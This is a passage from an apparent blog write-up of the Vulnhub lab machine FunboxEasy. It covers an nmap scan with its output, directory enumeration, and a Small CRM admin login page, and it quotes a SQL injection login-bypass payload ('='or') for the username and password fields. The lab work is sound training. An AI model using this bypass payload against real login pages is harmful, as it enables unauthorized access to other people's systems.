muzec - FunboxEasy Writeup | root💀muzec-sec:~#

Boot2Root ! Easy going, but with this Funbox you have to spend a bit more time. Much more, if you stuck in good traps. But most of the traps have hints, that they are traps. Vulnhub link to download FunboxEasy:- FunboxEasy

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

Nmap scan report for 192.168.250.111
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 17 04:15:11 2020 -- 1 IP address (1 host up) scanned in 67.65 seconds

Ok let hit the robots.txt on port 80.

Gym let try to access it with the IP/gym

I spend a little time trying to get the right credentials but no luck so i decided to burst some directorys with dirbuster i think the robots.txt is the first rabbit hole lol.

Another dir let check it out.

Small CRM Projects admin login page let try to check for some default credentials or maybe a vulnerable to get in.

Description: There is a SQL injection vulnerability in the /index.php page which allows for an attacker to use the SQLi login bypass payload ‘=’‘or’ for both the username and password parameters, this allows for any authenticated or low level user to login to the admin account.